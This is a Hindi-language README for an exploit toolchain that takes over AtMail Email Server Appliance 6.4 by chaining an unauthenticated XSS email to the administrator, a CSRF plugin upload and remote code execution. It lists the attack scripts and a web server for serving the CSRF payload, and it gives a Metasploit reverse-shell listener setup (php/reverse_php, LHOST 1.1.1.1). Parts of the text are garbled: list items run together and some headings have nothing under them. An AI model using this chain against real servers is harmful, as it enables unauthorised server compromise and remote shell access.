
AtMail ईमेल सर्वर एप्लायंस 6.4 - एक्सप्लॉइट टूलचेन (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
अस्वीकरण: यह एक्सप्लॉइट टूलचेन EDB-ID 20009 से प्रेरित है।
इस एक्सप्लॉइट टूलचेन का लक्ष्य EDB-ID 20009 को प्रतिस्थापित करना है।
इस टूलचेन के लाभ EDB-ID 20009 एक्सप्लॉइट की तुलना में:
EDB-ID 20009 एक्सप्लॉइट के नुकसान:
msfvenom)ArchLinux पर आवश्यकताएँ स्थापित करें:
$ sudo pacman -S metasploit tar ruby
एक्सप्लॉइट फ़ाइलें:
config.yml में टूलचेन कॉन्फ़िगरेशन होता हैexploit.sh एक्सप्लॉइट रैपर जिसे निष्पादित करने की आवश्यकता हैxss_mail.rb Atmail SMTP सर्वर के माध्यम से XSS वाला ईमेल व्यवस्थापक को भेजेगा (अनधिकृत)।csrf_prepare.rb CSRF पेलोड तैयार करेगा (लक्ष्य सेट करना और प्लगइन संग्रह को एन्कोड करना)rce_prepare.rb RCE तैयार करेगा (रिवर्स शेल उत्पन्न करना और प्लगइन संग्रह बनाना)csrf_plugin.js तैयार CSRF पेलोडnoraj/ फ़ोल्डर जिसमें असम्पीडित प्लगइन आर्किटेक्चर हैएक्सप्लॉइट टूलचेन के लिए केवल 2 मैन्युअल चरणों की आवश्यकता है:
config.yml संपादित करेंexploit.sh लॉन्च करेंलेकिन हमले को लॉन्च करने से पहले, एक वेब सर्वर को JavaScript CSRF फ़ाइल वितरित करने की आवश्यकता होती है और एक रिवर्स शेल लिसनर को कनेक्शन की प्रतीक्षा करनी होती है। तो हमला इस प्रकार दिखेगा:
config.yml संपादित करेंcsrf_plugin.js वितरित करेगाexploit.sh लॉन्च करेंवन-लाइन HTTP सर्वर का उदाहरण:
$ ruby -run -e httpd . -p 8000
रिवर्स शेल लिसनर का उदाहरण:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run